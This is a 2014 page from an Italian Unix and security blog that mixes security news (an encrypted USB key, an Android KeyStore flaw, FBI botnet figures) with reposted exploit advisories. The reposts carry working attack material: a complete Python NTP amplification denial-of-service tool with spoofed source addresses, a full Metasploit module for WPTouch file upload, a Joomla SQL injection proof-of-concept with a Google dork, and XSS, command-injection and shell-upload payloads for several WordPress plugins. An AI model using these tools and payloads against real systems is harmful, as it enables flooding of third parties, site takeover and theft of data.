MondoUnix Unix, Linux, FreeBSD, BSD, GNU, Kernel , RHEL, CentOS, Solaris, AIX, HP-UX, Mac OS X, Tru64, SCO UnixWare, Xenix, HOWTO, NETWORKING, IPV6

18Jul/140

Independence Key, massima sicurezza e comodità per la protezione dei dati

INDIPENDENCE KEY

La sicurezza dei dati, al giorno d'oggi, è sempre più critica, soprattutto in ambienti business. Si pensi a segreti industriali, a informazioni riservate in possesso di professionisti come medici e commercialisti.

Un tempo i dati erano archiviati solo su supporto cartaceo ed erano facilmente copiabili. Oggi la tecnologia, unita alla estrema miniaturizzazione, consente di archiviare enormi quantità di dati nello spazio di pochi centimetri, o addirittura millimetri.

E' il caso delle comunissime chiavette USB che però hanno un problema, si possono rubare e il loro contenuto può essere letto da chiunque. Un problema che non riguarda, però, la Independence Key, una chiavetta USB cifrata basata su AES 256, il sistema di cifratura più sicuro al mondo, usato anche dal governo degli Stati Uniti.

L'utilizzo è davvero semplice e veloce, grazie ai 100 Mbps offerti dal chip TPM incorporato nella chiavetta la cifratura avviene in tempo reale e in modo trasparente all'utilizzatore.
Nessun problema nemmeno per la conservazione dei dati sul Cloud. Le chiavi generate sono uniche e seguono sempre i dati, ovunque essi vadano.

E se la chiavetta viene persa o rubata? Nessun problema, perchè Independence Key è dotata dell'esclusivo Security Cap, un piccolo dispositivo che si collega alla porta USB supplementare di cui è dotata la chiavetta, agendo da backup (crittografato) dei dati.

Il Security Cap viene associato alla chiavetta in modo indissolubile, a livello hardware, consentendo il recupero dei dati. E' da tenere presente che nessuno, nemmeno la Quantec (la casa produttrice della Independence Key) può recuperare i dati, a parte il legittimo proprietario.

Se si presentasse la necessità di condividere con altri i propri dati, nessun problema: la funzione "Crypt & Share" permette di farlo con altri utilizzatori della chiavetta.
E' persino possibile creare una rete attraverso la quale condividere i dati in modo sicuro, senza dover creare delle VPN.

Anche l'uso del Cloud (servizi come Dropbox, Skydrive etc.) è del tutto sicuro e protetto.
Si può creare un disco interamente cifrato che sincronizza solo le differenze con lo spazio sul Cloud stesso, risparmiando così tempo e occupazione di banda.

Il prezzo della chiavetta è 250€+IVA, pienamente meritati per le funzioni offerte. Questo il link per ulteriori informazioni.

Fonte: http://tecnologia.tiscali.it/articoli/news/sicurezza-informatica/14/06/independence-key-massima-sicurezza-e-comodita-per-la-protezione-dei-dati.html?news_sicurezza

(310)

18Jul/140

Usate Android 4.3? Non permettete al malware di rubarvi le password

android password

Se fate parte di quel 10,3% di utenti Android che utilizzano la versione 4.3 (Jelly Bean) i vostri dati di login sono a rischio a causa di una vulnerabilità di KeyStore, il database crittografico del sistema operativo che si occupa di conservare le chiavi e altri dati sensibili.

Un team di ricercatori di IBM ha scoperto che il programma è vulnerabile grazie a un attacco di buffer overflow basato su stack, il che in pratica significa poter eseguire del codice malevolo per impadronirsi delle credenziali del telefono e quindi accedere a dati personali presenti sul dispositivo.

Gli hacker dovrebbero comunque avere delle doti non comuni per poter fare ciò.
Innanzitutto sarebbe necessario violare gli strati software protettivi di Android, quelli cioè che impediscono ad app non autorizzate di eseguire codice, e poi entrare nel sistema di randomizzazione degli spazi di indirizzamento. Difficile, ma non impossibile.

I ricercatori avevano già comunicato la vulnerabilità al team che si occupa della sicurezza di Android in Google lo scorso settembre, e lo stesso team aveva provveduto a rilasciare una patch in KitKat (Android 4.4) due mesi più tardi.
Col risultato che solo gli utilizzatori di quest'ultima versione di Android sono al sicuro, mentre chi ha un dispositivo con Jelly Bean, Gingerbread, Ice Cream Sandwich o Froyo è ancora a rischio.

KitKat attualmente è installato sul 13,6% dei dispositivi basati su Android, ciò significa che il rimanente 86,4% potrebbe avere problemi. Si spera che Google rilasci una fix anche per questi, nonostante sia veramente difficile che un attacco venga eseguito con successo sul proprio smartphone.

Nel frattempo si consiglia di installare app scaricate solo dal Google Play Store, di controllare se per il proprio dispositivo sono stati rilasciati aggiornamenti, di installare app antimalware/antivirus affidabili.

Fonte: http://tecnologia.tiscali.it/articoli/news/sicurezza-informatica/14/07/usate-android-43-non-fatevi-rubare-le-password.html?news_sicurezza
(162)

18Jul/140

Joomla Youtube Gallery 4.1.7 SQL Injection

# Exploit Title: Joomla component com_youtubegallery - SQL Injection vulnerability
# Google Dork: inurl:index.php?option=com_youtubegallery
# Date: 15-07-2014
# Exploit Author: Pham Van Khanh (phamvankhanhbka@gmail.com)
# Vendor Homepage: http://www.joomlaboat.com/youtube-gallery
# Software Link: http://www.joomlaboat.com/youtube-gallery
# Version: 4.x ( 3.x maybe)
# Tested on: newest version 4.1.7 on Joomla 1.5, 2.5, 3
# CVE : CVE-2014-4960
 
Detail:
In line: 40, file: components\com_youtubegallery\models\gallery.php,
if parameter listid is int (or can cast to int), $listid and $themeid
will not santinized.
Source code:
40: if(JRequest::getInt('listid'))
41: {
42:        //Shadow Box
43:        $listid=JRequest::getVar('listid');
44:
45:
46:        //Get Theme
47:         $m_themeid=(int)JRequest::getVar('mobilethemeid');
48:         if($m_themeid!=0)
49:         {
50:              if(YouTubeGalleryMisc::check_user_agent('mobile'))
51:                    $themeid=$m_themeid;
52:              else
53:                    $themeid=JRequest::getVar('themeid');
54:              }
55:          else
56:               $themeid=JRequest::getVar('themeid');
57: }
After, $themeid and $listid are used in line 86, 92. Two method
getVideoListTableRow and getThemeTableRow concat string to construct
sql query. So it is vulnerable to SQL Injection.
Source code:
86: if(!$this->misc->getVideoListTableRow($listid))
87: {
88:         echo '<p>No video found</p>';
89:         return false;
90: }
91:
92: if(!$this->misc->getThemeTableRow($themeid))
93: {
94:          echo '<p>No video found</p>';
95:          return false;
96: }
 
# Site POF: http://server/index.php?option=com_youtubegallery&view=youtubegallery&listid=1&themeid=1'&videoid=ETMVUuFbToQ&tmpl=component&TB_iframe=true&height=500&width=700

(47)

17Jul/140

Botnets infecting 18 systems per second, warns FBI

BOTNET

Criminals are developing increasingly sophisticated attack strategies that let them infect as many as 18 systems per second with their botnet armies, according to the FBI.

FBI assistant director Joseph Demarest revealed the statistic while briefing a Senate sub-committee about the agency's current and future anti-cyber crime strategy on Tuesday. He said the news is troubling as the botnets' high infection rate costs the US and global economies billions of dollars.

"The use of botnets is on the rise. Industry experts estimate that botnet attacks have resulted in the overall loss of millions of dollars from financial institutions and other major US businesses," he said.

"The impact of this global cyber threat has been significant. Botnets have caused over $9bn in losses to US victims and over $110bn in losses globally. Approximately 500 million computers are infected globally each year, translating into 18 victims per second."

Demarest added this is doubly troubling as many of the botnets are currently rentable and could be used by a variety of criminals or terrorist organisations.

"As you well know, we face cyber threats from state-sponsored hackers, hackers for hire, organised cyber syndicates and terrorists. They seek our state secrets, our trade secrets, our technology and our ideas – things of incredible value to all of us," he said.

"They may seek to strike our critical infrastructure and our economy. The threat is so dire that cyber security has topped the Director of National Intelligence's list of global threats for the second consecutive year."

The FBI assistant director's claim follows the discovery of a new Energetic Bear hack campaign targeting critical infrastructure. The threat was so severe that at the start of July the US Industrial Control Systems Cyber Emergency Response Team (ICS-CERT) issued a warning urging firms involved in critical infrastructure to check their systems.

Demarest said the FBI is already developing new technologies and techniques to help mitigate the growing threat, but argued that increased collaboration between law enforcement agencies and the public and private sector is needed to deal with the problem.

"The FBI's overall goal is to remove, reduce, and prevent cyber crime by attacking the threat through the identification of the most significant cyber criminal actors. Our success can only be attained through co-ordination of our overall cyber criminal strategy amongst all FBI Cyber Division's existing and emerging entities," he said.

"The FBI cyber criminal strategy also includes working closely with our international partners to develop a holistic assessment of the threat posed by cyber criminals and organisations to partner countries.

"Through this collaborative process, the FBI hopes to launch aggressive and comprehensive mitigation strategies through joint investigations and operational partnerships with law enforcement partners, private industry, and academia."

Demarest highlighted the recent success of the recent international Gameover Zeus takedown as proof of his claim. "In June 2014, the FBI announced a multinational effort to disrupt the Gameover Zeus botnet, the most sophisticated botnet that the FBI and its allies had ever attempted to disrupt," he said.

"This effort to disrupt it involved impressive co-operation with the private sector and international law enforcement. The FBI is proud of these successes, but we recognise that we must constantly strive to be more efficient and effective. Just as our adversaries continue to evolve, so too must the FBI.

Experts within the security community have been less positive about the Gameover Zeus operation, though. Speaking to V3 after the takedown many warned the operation could spur the botnet's owners to develop more dangerous attack strategies.

The warnings proved right on 11 July when an evolved, more resilient version of the Gameover Zeus botnet was discovered.

FONTE: http://www.v3.co.uk/v3-uk/news/2355596/botnets-infecting-18-systems-per-second-warns-fbi

(89)

17Jul/140

NTP Amplification Denial Of Service Tool

#!/usr/bin/env python
from scapy.all import *
import sys
import threading
import time
#NTP Amp DOS attack
#by DaRkReD
#usage ntpdos.py <target ip> <ntpserver list> <number of threads> ex: ntpdos.py 1.2.3.4 file.txt 10
 
#packet sender
def deny():
  #Import globals to function
  global ntplist
  global currentserver
  global data
  global target
  ntpserver = ntplist[currentserver] #Get new server
  currentserver = currentserver + 1 #Increment for next 
  packet = IP(dst=ntpserver,src=target)/UDP(sport=48947,dport=123)/Raw(load=data) #BUILD IT
  send(packet,loop=1) #SEND IT
 
#So I dont have to have the same stuff twice
def printhelp():
  print "NTP Amplification DOS Attack"
  print "By DaRkReD"
  print "Usage ntpdos.py <target ip> <ntpserver list> <number of threads>"
  print "ex: ex: ntpdos.py 1.2.3.4 file.txt 10"
  print "NTP serverlist file should contain one IP per line"
  print "MAKE SURE YOUR THREAD COUNT IS LESS THAN OR EQUAL TO YOUR NUMBER OF SERVERS"
  exit(0)
 
if len(sys.argv) < 4:
  printhelp()
#Fetch Args
target = sys.argv[1]
 
#Help out idiots
if target in ("help","-h","h","?","--h","--help","/?"):
  printhelp()
 
ntpserverfile = sys.argv[2]
numberthreads = int(sys.argv[3])
#System for accepting bulk input
ntplist = []
currentserver = 0
with open(ntpserverfile) as f:
    ntplist = f.readlines()
 
#Make sure we dont out of bounds
if  numberthreads > int(len(ntplist)):
  print "Attack Aborted: More threads than servers"
  print "Next time dont create more threads than servers"
  exit(1)
 
#Magic Packet aka NTP v2 Monlist Packet
data = "\x17\x00\x03\x2a" + "\x00" * 4
 
#Hold our threads
threads = []
print "Starting to flood: "+ target + " using NTP list: " + ntpserverfile + " With " + str(numberthreads) + " threads"
print "Use CTRL+C to stop attack"
 
#Thread spawner
for n in range(numberthreads):
    thread = threading.Thread(target=deny)
    thread.daemon = True
    thread.start()
 
    threads.append(thread)
 
#In progress!
print "Sending..."
 
#Keep alive so ctrl+c still kills all them threads
while True:
  time.sleep(1)

(50)

16Jul/140

WordPress WPTouch Authenticated File Upload

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::HTTP::Wordpress
  include Msf::Exploit::FileDropper
 
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Wordpress WPTouch Authenticated File Upload',
      'Description'    => %q{
          The Wordpress WPTouch plugin contains an auhtenticated file upload
          vulnerability. A wp-nonce (CSRF token) is created on the backend index
          page and the same token is used on handling ajax file uploads through
          the plugin. By sending the captured nonce with the upload, we can
          upload arbitrary files to the upload folder. Because the plugin also
          uses it's own file upload mechanism instead of the wordpress api it's
          possible to upload any file type.
          The user provided does not need special rights. Also users with "Contributer"
          role can be abused.
      },
      'Author'         =>
        [
          'Marc-Alexandre Montpas', # initial discovery
          'Christian Mehlmauer'     # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'URL', 'http://blog.sucuri.net/2014/07/disclosure-insecure-nonce-generation-in-wptouch.html' ]
        ],
      'Privileged'     => false,
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Targets'        => [ ['wptouch < 3.4.3', {}] ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jul 14 2014'))
 
    register_options(
      [
        OptString.new('USER', [true, "A valid username", nil]),
        OptString.new('PASSWORD', [true, "Valid password for the provided username", nil]),
      ], self.class)
  end
 
  def user
    datastore['USER']
  end
 
  def password
    datastore['PASSWORD']
  end
 
  def check
    readme_url = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wptouch', 'readme.txt')
    res = send_request_cgi({
      'uri'    => readme_url,
      'method' => 'GET'
    })
    # no readme.txt present
    if res.nil? || res.code != 200
      return Msf::Exploit::CheckCode::Unknown
    end
 
    # try to extract version from readme
    # Example line:
    # Stable tag: 2.6.6
    version = res.body.to_s[/stable tag: ([^\r\n"\']+\.[^\r\n"\']+)/i, 1]
 
    # readme present, but no version number
    if version.nil?
      return Msf::Exploit::CheckCode::Detected
    end
 
    vprint_status("#{peer} - Found version #{version} of the plugin")
 
    if Gem::Version.new(version) < Gem::Version.new('3.4.3')
      return Msf::Exploit::CheckCode::Appears
    else
      return Msf::Exploit::CheckCode::Safe
    end
  end
 
  def get_nonce(cookie)
    res = send_request_cgi({
      'uri'    => wordpress_url_backend,
      'method' => 'GET',
      'cookie' => cookie
    })
 
    # forward to profile.php or other page?
    if res and res.code.to_s =~ /30[0-9]/ and res.headers['Location']
      location = res.headers['Location']
      print_status("#{peer} - Following redirect to #{location}")
      res = send_request_cgi({
        'uri'    => location,
        'method' => 'GET',
        'cookie' => cookie
      })
    end
 
    if res and res.body and res.body =~ /var WPtouchCustom = {[^}]+"admin_nonce":"([a-z0-9]+)"};/
      return $1
    else
      return nil
    end
  end
 
  def upload_file(cookie, nonce)
    filename = "#{rand_text_alpha(10)}.php"
 
    data = Rex::MIME::Message.new
    data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"myfile\"; filename=\"#{filename}\"")
    data.add_part('homescreen_image', nil, nil, 'form-data; name="file_type"')
    data.add_part('upload_file', nil, nil, 'form-data; name="action"')
    data.add_part('wptouch__foundation__logo_image', nil, nil, 'form-data; name="setting_name"')
    data.add_part(nonce, nil, nil, 'form-data; name="wp_nonce"')
    post_data = data.to_s
 
    print_status("#{peer} - Uploading payload")
    res = send_request_cgi({
      'method'   => 'POST',
      'uri'      => wordpress_url_admin_ajax,
      'ctype'    => "multipart/form-data; boundary=#{data.bound}",
      'data'     => post_data,
      'cookie'   => cookie
    })
 
    if res and res.code == 200 and res.body and res.body.length > 0
      register_files_for_cleanup(filename)
      return res.body
    end
 
    return nil
  end
 
  def exploit
    print_status("#{peer} - Trying to login as #{user}")
    cookie = wordpress_login(user, password)
    if cookie.nil?
      print_error("#{peer} - Unable to login as #{user}")
      return
    end
 
    print_status("#{peer} - Trying to get nonce")
    nonce = get_nonce(cookie)
    if nonce.nil?
      print_error("#{peer} - Can not get nonce after login")
      return
    end
    print_status("#{peer} - Got nonce #{nonce}")
 
    print_status("#{peer} - Trying to upload payload")
    file_path = upload_file(cookie, nonce)
    if file_path.nil?
      print_error("#{peer} - Error uploading file")
      return
    end
 
    print_status("#{peer} - Calling uploaded file #{file_path}")
    res = send_request_cgi({
      'uri'    => file_path,
      'method' => 'GET'
    })
  end
end

(91)

15Jul/140

WordPress DZS Video Gallery XSS / Path Disclosure / Command Execution

These are Cross-Site Scripting, Full path disclosure and OS Commanding 
vulnerabilities in plugin DZS Video Gallery for WordPress.
 
Earlier I've disclosed Content Spoofing and Cross-Site Scripting 
vulnerabilities in this plugin (http://securityvulns.ru/docs30871.html).
 
-------------------------
Affected products:
-------------------------
 
Vulnerable are all versions of DZS Video Gallery for WordPress.
 
-------------------------
Affected vendors:
-------------------------
 
Digital Zoom Studio
http://digitalzoomstudio.net
 
----------
Details:
----------
 
Cross-Site Scripting (WASC-08):
 
http://site/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
 
http://site/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?designrand=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
 
Full path disclosure (WASC-13):
 
http://site/wp-content/plugins/dzs-videogallery/videogallery.php
 
http://site/wp-content/plugins/dzs-videogallery/admin/sliderexport.php
 
FPD in php-files of the plugin (by default) or in error_log - in all folders 
of the plugin. The files vary depending on version of the plugin.
 
OS Commanding (WASC-31):
 
http://site/wp-content/plugins/dzs-videogallery/img.php?webshot=1&src=http://site/1.jpg$(os-cmd)
 
RCE using method of Pichaya Morimoto 
(http://seclists.org/fulldisclosure/2014/Jun/117).
 
------------
Timeline:
------------ 
 
2014.05.08 - announced at my site.
2014.05.09 - informed developer, but he ignored.
2014.07.12 - disclosed at my site (http://websecurity.com.ua/7152/).
 
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

(224)

15Jul/140

WordPress Tidio Gallery 1.1 Shell Upload / XSS

######################
# Exploit Title : Wordpress Tidio Gallery 1.1 Shell Upload and XSS Vulnerabilities
 
# Exploit Author : Claudio Viviani
 
# Vendor Homepage : http://www.tidioelements.com/
 
# Software Link : http://downloads.wordpress.org/plugin/tidio-gallery.zip
 
# Date : 2014-07-14
 
# Tested on : Windows 7 / Mozilla Firefox
 
######################
 
# Location :  
 
http://VICTIM/wp-content/plugins/tidio-gallery/popup-insert-help.php -> XSS
 
http://VICTIM/wp-content/plugins/tidio-gallery/popup-insert-post.php -> Upload Shell
 
 
######################
 
# Vulnerablity n°1:
 
XSS Reflected Unauthenticated
 
http://VICTIM/wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId="/><script>alert(1);</script>
 
# Vulnerablity n°2:
 
Unprivileged user like subscriber could upload shell script.
The plugin rename file with "md5(microtime())" php functions. 
 
1) Connect to url: http://VICTIM/wp-admin/admin-ajax.php?action=tidio_gallery_popup_insert_post
 
2) Click "add gallery" button
 
3) Click "edit" option
 
4) Click "add image" button
 
5) Click "upload" option and select php shell from local drive
 
6) Refresh page (ex. press F5 key)
 
7) View source page (ex. right-click -> view source page) and search string like this: 
   "fileUrl":"http://VICTIM/wp-content/uploads/2014/07/14625a7ca5df93c49910a502ef9aabfb.php"
   Skip file with "*-thumb.php" extension.
 
8) Open browser and connect to http://VICTIM/wp-content/uploads/2014/07/14625a7ca5df93c49910a502ef9aabfb.php
 
 
#####################
 
Discovered By : Claudio Viviani
    http://www.homelab.it
    info@homelab.it
 
    https://www.facebook.com/homelabit
    https://twitter.com/homelabit
    https://plus.google.com/+HomelabIt1/
 
#####################

(87)

15Jul/140

WordPress CopySafe PDF Protection 0.6 Shell Upload

##################################################################################################
#Exploit Title : Wordpress Plugin CopySafe PDF Protection Shell Upload 
vulnerability
#Author        : Jagriti Sahu
#Download Link : http://wordpress.org/support/plugin/wp-copysafe-pdf
#version affected :  0.6 and below
#Date          : 14/07/2014
#Discovered at : IndiShell Lab
#Love to       : Surbhi, Mradula and Harry
##################################################################################################
 
////////////////////////
/// Overview:
////////////////////////
  Wordpress Plugin CopySafe PDF Protection(upto version 0.6) suffers 
from unrestricted file upload vulnerability which allow an attacker to 
upload malecious php shell on server.
to avaid exploitation , update plugin to version 0.7
 
///////////////////////////////
// Vulnerability Description:
///////////////////////////////
vulnerability is due to lib/uploadify/uploadify.php file in which there 
is no check during file upload
attacker need to forward file upload request to this file with PHP 
shell and file upload path
 
 
///////////////////////
///  exploit code  ////
///////////////////////
 
 
<form 
action="http://website.com/wp-content/plugins/wp-copysafe-pdf/lib/uploadify/uploadify.php" 
method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="wpcsp_file" ><br>
<input type=text name="upload_path" value="../../../../uploads/">
<input type="submit" name="submit" value="Submit">
</form>
 
save this code on you machine as exploit.html
open exploit.html into webbrowser, brows your php shell and click 
submit button
 
shell will be uploaded in uploads directory
http://website.com/wp-content/uploads/shell.php

(86)

12Jul/140

WordPress Compfight 1.4 Cross Site Scripting

######################
# Exploit Title : Wordpress Compfight 1.4 Authenticated Cross Site Scripting
 
# Exploit Author : Claudio Viviani
 
# Vendor Homepage : http://wordpress.org/plugins/easy-banners/
 
# Software Link : http://downloads.wordpress.org/plugin/compfight.1.4.zip
 
# Date : 2014-07-03
 
# Tested on : Windows 7 / Mozilla Firefox
 
######################
 
# Location :  
http://localhost/wp-content/plugins/compfight/compfight-search.php
 
######################
 
# Vulnerable code :
 
  if (!$search_value) {
      $input_text = 'Enter Keyword(s)';
    } else {
      $input_text = $search_value;
    }
 
    if ($show_title) {
      $output .= '<h3 class="cf_search_title">Compfight</h3>';
      $output .= '<p class="cf_search_subtitle">Locate the visual inspiration<br/>you need. Super fast!</p>';
    }
 
    $output .= '<form method="GET" action="" id="cf-form">';
    $output .= '<input type="text" name="search-value" id="search-value" value="' . $input_text . '" onClick="javascript:if(this.value==\'Enter Keyword(s)\') { this.value = \'\'; };" />';
    $output .= '<input type="submit" name="search" id="search" value="Search" class="button" />';
    $output .= '</form>';
 
$input_text variable not sanitized
 
######################
 
Exploit Code:
 
http://localhost/plugins/compfight/compfight-search.php?search-value='"/><script>alert(1);</script>&search=Search
 
 
#####################
 
Discovered By : Claudio Viviani
    http://www.homelab.it
    info@homelab.it
 
    https://www.facebook.com/homelabit
    https://twitter.com/homelabit
    https://plus.google.com/+HomelabIt1/
 
#####################

(72)